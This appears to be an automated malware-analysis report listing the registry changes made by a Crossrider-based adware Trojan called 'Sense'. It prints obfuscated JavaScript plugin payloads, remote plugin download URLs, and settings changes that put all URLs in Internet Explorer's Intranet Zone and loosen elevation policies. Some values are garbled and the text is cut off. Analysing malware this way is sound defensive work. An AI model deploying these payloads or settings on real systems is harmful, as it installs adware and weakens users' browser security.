[HKCU\Software\Sense\Plugins\207]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/207.js"

[HKCU\Software\Sense\Plugins\244]
"Version" = "5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Sense\Plugins]
"BgPluginList" = "246,42,38,46,41,44,39,35,43,36,4,14,78,64,183,207,47,182,72,269,93,102,123,180,184,191,192,220,221,223,226,239,242,244,262,263,281,91"

[HKCU\Software\Sense\Plugins\102]
"Name" = "dealply_m"

[HKCU\Software\Sense\Plugins\7]
"Version" = "2"

[HKCU\Software\Sense\Manifest]
"PublisherId" = "20891"

[HKCU\Software\Sense\Plugins\2]
"JavaScript" = "(function(){var b=dummy so this plugin won't be empty;})();"

[HKCU\Software\Sense\Plugins\182]
"Name" = "openUrl"

[HKCU\Software\Sense\Plugins\180]
"Version" = "12"

[HKCU\Software\Sense\Plugins\182]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/182.js"

[HKCU\Software\Sense\Installer]
"FullVersion" = "1.34.8.12"

[HKCU\Software\Sense\Plugins\13]
"Version" = "7"

[HKCU\Software\Sense\Plugins\191]
"Version" = "7"

[HKCU\Software\Sense\Manifest]
"Description" = "."

[HKCU\Software\Sense\Plugins\42]
"JavaScript" = "var Consts={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(typeof appAPI===undefined){appAPI={};}appAPI.__should_activate_validation__=true;(function(a){if(typeof window==undefined){window={};}if(typeof window.document===undefined){window.document={};document=window.document;}if(typeof window.alert===undefined){window.alert=function(b){var c;if(typeof b===undefined){c=undefined;}else{if(b===null){c=null;}else{c=b.toString();}}if(typeof c===string){a.alert(c);}};alert=window.alert;}})(appAPIinternal);if(typeof console===undefined){window.console={};console=window.console;}if(typeof console.log===undefined){window.console.log=function(a){};console.log=window.console.log;}if(typeof console.info===undefined){window.console.info=function(a){};console.info=window.console.info;}if(typeof console.warn===undefined){window.console.warn=function(a){};console.warn=window.console.warn;}if(typeof console.error===undefined){window.console.error=function(a){};console.error=window.console.error;-"

[HKCU\Software\Sense\Plugins\191]
"Name" = "ciuvo_m"

[HKCU\Software\Sense\Plugins\46]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal===undefined){appAPI.internal={};appAPI.internal.callbacks={};}else{if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}}}appAPI.internal.callbacks.timersListeners={};appAPI.internal.callbacks.timersIsInterval={};appAPI.internal.callbacks.timer=function(b){var a=b.timerId;if(typeof a!==number){return;}if(typeof appAPI.internal.callbacks.timersListeners[a]===undefined){return;}var d=appAPI.internal.callbacks.timersListeners[a];if(!appAPI.internal.callbacks.timersIsInterval[a]){clearInterval(a);delete appAPI.internal.callbacks.timersListeners[a];delete appAPI.internal.callbacks.timersIsInterval[a];}try{d();}catch(c){console.error(setInterval/setTimeout - Caught an exception from user callback: (typeof c.message===string?c.message:???));}};(function(a){appAPI.setInterval=function(d,c,e){if((typeof d!==undefined)&&(typeof c===number)){var b=a.setIn-"

[HKCU\Software\Sense\Installer]
"CodeDownloadDomain" = "http://js.loadgenclientservice.com"

[HKCU\Software\Sense\Plugins\46]
"Name" = "IETimers"

[HKCU\Software\Sense\Plugins\4]
"JavaScript" = "var jQuery = $jquery_171 = $jquery = null;if (document && typeof document.getElementById !== undefined) {/*! jQuery v1.7.1 jquery.com | jquery.org/license */(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f().appendTo(b),e=d.css(display);d.remove();if(e===none||e===){cl||(cl=c.createElement(iframe),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm||!cl.createElement)cm=(cl.contentWindow||cl.contentDocument).document,cm.write((c.compatMode===CSS1Compat?:) ),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,display),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject(Microsoft.XMLHTTP)}catch(b){}}function ci(){try{return new a.XMLHtt䑃-"

[HKCU\Software\Sense\Plugins\220]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/220.js"

[HKCU\Software\Sense\Plugins\3]
"Version" = "2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Sense\Plugins\269]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2ZjYzNTExZjFmMWMxMjNhMDIxODQ3NTA1MzU1MDMxYzE2MWY0YTViNGExYTBiNTkwNjExMDMwYzA0MWQxMzBmMDAwMzBhMWMxMTQxMTMxYjA4NDUxMjE0MWYwMTE0MGE1ZjFkMDA0NDE5MDQ1NDFhMGMwYjRkMmIzYTM4M2QzMzM0Mzc0MDQzN2E3ZDQ3MDIwNzAzMWIxYjM3MWQxYzU2NWY0YTUxMWYxZjFjMTIxYzRhNWI0YTA4NDAxOTUzMDY1MTAxNDI1YTE2MTkxZjU5MDMxZjAxMGIxZTVhMGIwZjA3NTgwYTBiMTYwNjA2MTE0YTAzMTY1OTAxMWI1ZDFkMWUxMDU4MzUyYzI1MjUyYzNkMzA1MjU4NmY2MzUxMDcwNzFkMDUwNjFlM2QwMTQ4NDk1NzU5NWU1YjY1MGQ=', 'tejswkhbop'); }"

[HKCU\Software\Sense\Plugins\28]
"Version" = "4"

[HKCU\Software\Sense\Plugins\246]
"JavaScript" = "var _0x79d9=[""\x6C\x65\x6E\x67\x74\x68""

[HKCU\Software\Sense\Plugins\41]
"Version" = "7"

[HKCU\Software\Sense\Plugins\21]
"Name" = "debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Sense\Plugins\226]
"Name" = "set_campaign_id_m"

[HKCU\Software\Sense\Plugins\43]
"Version" = "5"

[HKCU\Software\Sense\Plugins\239]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/239.js"

[HKCU\Software\Sense\Plugins\220]
"Version" = "22"

[HKCU\Software\Sense\Plugins\1]
"JavaScript" = "var __a0__=[""\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x39\x75\x36\x61\x32\x70\x36""

[HKCU\Software\Sense\Installer]
"Time" = "1411237378"

[HKCU\Software\Sense\Plugins\4]
"Name" = "jquery_1_7_1"

[HKCU\Software\Sense\Plugins\37]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/37.js"

[HKCU\Software\Sense\Plugins\281]
"Name" = "ibario_tier3_pops_m"

[HKCU\Software\Sense\Plugins\40]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/40.js"

[HKCU\Software\Sense\Plugins\180]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/180.js"

[HKCU\Software\Sense\Plugins\244]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MGY2NDdlNTcxZTFhMGMxMzJmMDAxODRjNGQ1NTU0MDYwYzE3MGE0ODViNDExMjBkMDI1YzU2MDYxNDE1MTUwOTEyMGMxNzQwMWIwYzE3NWQwMzA3MTMxMjEzMWE1NzBhMTQxODExMGQwMzJhMDUxZTE5MTExMTVkMWQwMDFkMmEwNTFlMGEwODI1MDEwMDBmMDUwMTEzMWM1NjA5MDk0ZDA0MDcxMzQ4M2EzYTNkMTAzNTM2MzU1ZjM4MzEyNzFkMzUwOTFkNDEzOTA0M2UwNjM4MmExYjU3MzUyNjM1NGI0NDMxNTAxZDBkMDExMzE2NDkzMTI4MzYyNDIxMmIzMDI4M2IzMDJiMjUyYTMzMzYyYzI2MzQzNjMxMmEyODI2MjMyYzI3MmEzZTJkMmI0ODE2MDUwNjAwMTkwZTFmNGYyYjMxMzQyNzM5M2QyYjMxMzMzNjMxM2MyODM0MjYzZTI3MmQzYjNmMzEzMTI4NTc1YTY0NzE0MTEyMDYwMDFlMDQyMDA0MDI1YTU5NWE1MDFjMWEwMzA1MDU1NDU3NGMxZjBhMDA1YzU5MTAxODA5MTkwNDFmMGIxNTQwMTQxYTFiNDEwZjBhMWUxNTExMWE1ODFjMTgwNDFkMDAwZTJkMDcxZTE2MDcxZDQxMTEwZDEwMmQwNzFlMDUxZTI5MWQwYzAyMDgwNjExMWM1OTFmMDU1MTA4MGExZTRmMzgzYTMyMDYzOTJhMzk1MjM1MzYyNTFkM2ExZjExNWQzNTA5MzMwMTNhMmExNDQxMzkzYTM5NDY0OTM2NTIxZDAyMTcxZjBhNDUzYzI1MzEyNjIxMjQyNjI0MjczYzI2MjgyZDMxMzYyMzMwMzgyYTNkMjcyNTIxMjEyYzI4M2MzMjMxMjc0NTFiMDIwNDAwMTYxODEzNTMyNzNjMzkyMDNiM2QyNDI3M2YyYTNkMzEyNTMzMjQzZTI4M2IzNzIzM2Q-"

[HKCU\Software\Sense\Plugins\44]
"Version" = "6"

[HKCU\Software\Sense\Plugins\4]
"URL" = "http://js.loadgenclientservice.com/plugins/javascripts/jquery-1_7_1_min.js"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Sense\Plugins\191]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/191.js"

[HKCU\Software\Sense\Plugins\192]
"Version" = "9"

[HKCU\Software\Sense\Plugins\36]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/36.js"

[HKCU\Software\Sense\Plugins\207]
"Name" = "dbWrapper"

[HKCU\Software\Sense\Plugins\246]
"Name" = "setup"

[HKCU\Software\Sense\Plugins\93]
"Name" = "superfish_no_coupons_m"

[HKCU\Software\Sense\Plugins\35]
"JavaScript" = "if(typeof appAPI===undefined){appAPI={};}(function(e){if(typeof appAPI.internal===undefined){appAPI.internal={};}if(typeof appAPI.internal.callbacks===undefined){appAPI.internal.callbacks={};}function f(m){if(typeof m===object){return m;}if(typeof m!==string){return null;}m=m.replace(/\r\n/g,\n);if(m.lastIndexOf(\n) 1==m.length){m.replace(/(?:(?:^|\n)\s |\s (?:$|\n))/g,).replace(/\s /g, );}var n=m.split(\n);var l={};for(var k=0;k
[HKCU\Software\Sense\Installer]
"CodeDownloadFbDomain" = "http://js.clientdemocloud.com"

[HKCU\Software\Sense\Plugins\22]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/22.js"

[HKCU\Software\Sense\Code]
"BgJavaScript" = "/************************************************************************************ This is your background code. For more information please visit our wiki site: http://docs.crossrider.com/#!/guide/scopes_background*************************************************************************************/appAPI.ready(function($) { // Place your code here (ideal for handling browser button, global timers, etc.)});"

[HKCU\Software\Sense\Plugins\239]
"Version" = "7"

[HKCU\Software\Sense\Plugins\184]
"JavaScript" = "if (typeof setup2 === 'function') { setup2('MWQ2NTY2NDUwYzE4MDcxZDIyMDAwYTRkNTU0NzQ2MDQwNzE5MDc0ODQ5NDAwMTE3MTc0MjFkMDIwNzAwMDkwZDAzMDIwOTFjMDMwZTU5MTEwOTAyNDAwOTE0MWYxMTQyMWIxZDAxMDYwYzQ5MGUxZjRjMjIwNTFiMDEwNjAxMmUwMDUxMzY1NTM2NDYyNzVkNWMyNjQ5MmU0MzVlNDM1ZjIzNWQ1ZTU2NDkyZDRhMmM0NzVmNTY1ZjVlNTI1NTViMzc1YzQ3MzQ1MDJhNDkzNDBkMTgxNjI0MTM0ZjM1MGUwMzAyMTc0YTIzMGMwNTA2MDgwYTFkMmUyMDUxNDE1ZDQ3NDI1NjQ5M2YxNTBiMDgwNjBlMDMzYzA3MDIwYTVhM2IzMzMwM2YzODIxMzUzZDI2MjMyMTNlMmMyYzI3MjIzOTIxMmUyYTIxMzMyYzRiMjMxZDA5MDMwZDA2MTYyNTE3NTAyODJkMjUzZDIwMzQzNzNlM2EyOTMyMjAzOTJhMzczMzIxMjIzNzI4MzMyZDM1M2EyZDM4MmQyODJjMzI1NTVlNmM2NjRkMGYxMDE4MDMxZTIyMDAwYTRkNTU0NzQ2MDQwNzE5MDcwMTVjNDA0MDA5MTQxZjVkMDMxODAyMTQwMDBkMGIwMTAxMDMxZDE0NWMwNTAwMDI0ODBhMWMwMDBmNTgxZTA5MDgwNjA0NGEwNjAwNTIzODAwMGYwODA2MDkyZDA4NGUyODRmMzM1MjJlNWQ1NDI1NDEzMTVkNDQ0NjRiMmE1ZDU2NTU0MTMyNTQzNjQyNGI1ZjVmNTY1MTVkNDQyOTQ2NDIyMDU5MmE0MTM3MDUwNzA4M2UxNjViM2MwZTBiMDExZjU1M2QxNjAwMTIwMTBhMTUyZDI4NGU1ZjQ3NDI1NjVmNDkzNzE2MDMxNzE4MTQwNjI4MGUwMjAyNTkzMzJjMmUyNTNkMzUzYzNkMmUyMDI5MjE"

[HKCU\Software\Sense\Plugins\91]
"JavaScript" = "(function(I){var x=[].slice;var w={};var a=function(ak){if(typeof ak==string&&typeof ak.trim==function){return ak.trim();}return ak==null?:ak.toString().replace(/^\s /,).replace(/\s $/,);};function f(ak){var al=w[ak]={},am,an;ak=ak.split(/\s /);for(am=0,an=ak.length;am
[HKCU\Software\Sense\Plugins\177]
"JavaScript" = "(function(){if(!(appAPI.isMatchPages&&appAPI.isMatchPages(*crossrider.com/extension_dashboard/dashboard.html))){return;}function o(p){return String(p).replace(//g,>);}function e(aR,aC){function aW(){while(aE.length&&(aE[aE.length-1]=== ||aE[aE.length-1]===aT)){aE.pop();}}function aq(p){return p===[EXPRESSION]||p===[INDENTED-EXPRESSION];}function af(p){return p.replace(/^\s\s*|\s\s*$/,);}function an(q){aQ.eat_next_space=false;if(ag&&aq(aQ.mode)){return;}q=typeof q===undefined?true:q;aQ.if_line=false;aW();if(!aE.length){return;}if(aE[aE.length-1]!==\n||!q){ac=true;aE.push(\n);}for(var p=0;p
[HKCU\Software\Sense\Manifest]
"DisableIe" = "true"
"IsButtonEnabled" = "false"

[HKCU\Software\Sense\Plugins\192]
"Name" = "revizer_ws_dynamic_b2b_m"

[HKCU\Software\Sense\Plugins]
"OnRequestPluginList" = "14,42,41,39,38,43,45,64,72"

[HKCU\Software\Sense\Plugins\40]
"Name" = "IEExtension"

[HKCU\Software\Sense\Manifest]
"PluginsManifestVersion" = "17"
"UninstallerOfferAction" = "NA"

[HKCU\Software\Crossrider]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"

[HKCU\Software\Sense\Plugins\39]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/39.js"

[HKCU\Software\Sense\Plugins\64]
"Version" = "3"

[HKCU\Software\Sense\Plugins\183]
"JavaScript" = "(function(){if(typeof $jquery_171===undefined){return;}var d=__TABS_ON_UPDATED_ACTIVE_KEY;var c=__tabsOnUpdateActive__;var a={SCOPE:{BACKGROUND:0,PAGE:1,POPUP:5,OPEN_URL:6}};if(!appAPI.utils.isFunction(appAPI.internal.globalEval)){appAPI.internal.globalEval=function(e){(new Function(e)).apply(window);};}if(appAPI.internal.scope==a.SCOPE.BACKGROUND){appAPI.tabs.reloadTab=function(e){if(typeof e.delay===number){appAPI.setTimeout(function(){appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});},e.delay);}else{appAPI.message.toAllTabs({tabId:e.tabId},{channel:__tabsReloadTab__});}};appAPI.tabs.executeScript=function(e){appAPI.message.toAllTabs(e,{channel:__tabsExecuteScript__});};appAPI.tabs.onTabUpdated=function(e){if(typeof e!==function){return;}appAPI.message.addListener({channel:__tabsOnTabUpdated__},function(f){e(f);});appAPI.internal.db.set(d,true);appAPI.message.toAllTabs({},{channel:c});};}else{if(appAPI.internal.scope==a.SCOPE.PAGE&&!appAPI.dom.isIframe()){var b=functi͋."

[HKCU\Software\Sense\Plugins\3]
"Name" = "ie8_fix_2"

[HKCU\Software\Sense\Manifest]
"homepageurl" = "NA"
"EnableSearchIE" = "false"

[HKCU\Software\Sense\Plugins\37]
"Name" = "IEBrowserEvents"

[HKCU\Software\Sense\Manifest]
"ThanksUrl" = "NA"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Sense\Plugins\94]
"JavaScript" = "appAPI.isBackground=false;appAPI.tabId=POPUP;appAPI.internal.scope=Consts.SCOPE.POPUP;appAPI.browserAction.setBadgeBackgroundColor=function(a){if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Expected an array but got: (typeof a));return;}if(a.length!==4){console.error(appAPI.browserAction.setBadgeBackgroundColor - Invalid parameter. Color array should have 4 members (RGBA));return;}appAPI.internal.message.send({eventName:onSetBadgeColorFromPopup,eventContent:a});};appAPI.browserAction.setBadgeText=function(c,a){var b={};if(typeof c!==string){console.error(appAPI.browserAction.setIcon - Invalid parameter. Expected string (1st param) but got: (typeof c));return;}b.text=c;if(typeof a===undefined||a===null){b.color=null;}else{if(!(a instanceof Array)){console.error(appAPI.browserAction.setBadgeText - Invalid parameter. Expected an array (2nd param) but got: (typeof a));return;}else{if(a.length!==4){console.error(appAPI.browserAction.se-"

[HKCU\Software\Sense\Installer]
"Params" = "{ source_id : 000803, sub_id : 0, uzid : 0"

[HKCU\Software\Sense\Plugins\46]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/46.js"

[HKCU\Software\Sense\Plugins\17]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/17.js"

[HKCU\Software\Sense\Plugins\64]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/64.js"

[HKCU\Software\Sense\Plugins\45]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/45.js"

[HKCU\Software\Sense\Plugins\102]
"URL" = "http://js.loadgenclientservice.com/plugins/mins/102.js"0>0?0:>10?0>

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe:2568 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 C5 45 80 A1 2D 28 B7 B3 1E 07 7F 09 52 A1 E6"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppPath" = "%Program Files%\Sense"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppPath" = "%Program Files%\Sense"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"Policy" = "3"
"AppPath" = "%Program Files%\Sense"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-codedownloader.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{944F6B12-2BBE-456A-8DCB-1DA1876FC0AE}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"Policy" = "3"
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-helper.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{DD7BF6E3-67C0-4DEC-9414-54B4FDE4BD83}]
"Policy" = "3"

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110611191115}" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110611191115}" = "1"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{91F845-D61A-427A-B15C-1BB2BBCF33C1}]
"AppName" = "a4f7d362-83b9-4acf-812c-4634a66ba943-2.exe-buttonutil64.exe"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{228FA0A2-7072-457F-A52-FC80B4C01743}]
"AppPath" = "%Program Files%\Sense"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"

The process Tkbjndnqomlxl.exe:2840 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrPublisherId" = "20891"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppPath" = "%Program Files%\Sense"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"CrAppId" = "61915"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Bic" = "2C8E11B2DAE94BCFA5FC713470AE08E4IE"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Sense-bg.exe" = "8000"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"srcid_var" = "000803"

[HKLM\SOFTWARE\GlobalUpdate\UpdateDev]
"AuCheckPeriodMs" = "21600000"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"pv" = "1.3.25.0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Sense\Installer]
"BundledFirefox" = "1"

"BundledIe" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"UninstallString" = "%Program Files%\Sense\Uninstall.exe /fcp=1"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Name" = "Object Browser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayName" = "Sense"

[HKLM\SOFTWARE\GlobalUpdate\Update\Clients\{7377509d-1ea7-45ad-9827-4971a2b4a820}]
"Verifier" = "39aa73fdbfd54b44fad467ed5553801b"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Sense\Installer]
"BundledAddCh" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 AF E5 DB D6 01 01 6A CA D1 D7 BD 94 07 06 E3"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{df4d2963-44c4-48ce-b8b9-3535538f39c5}]
"AppName" = "Sense-bg.exe"
"Policy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayIcon" = "%Program Files%\Sense\utils.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"Publisher" = "Object Browser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sense]
"DisplayVersion" = "1.34.8.12"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process regsvr32.exe:2328 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKCR\TypeLib\{44444444-4444-4444-4444-440644194415}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Sense"

[HKCR\Interface\{66666666-6666-6666-6666-660666196615}]
"(Default)" = "ISandBox"

[HKCR\Interface\{55555555-5555-5555-5555-550655195515}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CrossriderApp0061915.Sandbox\CurVer]
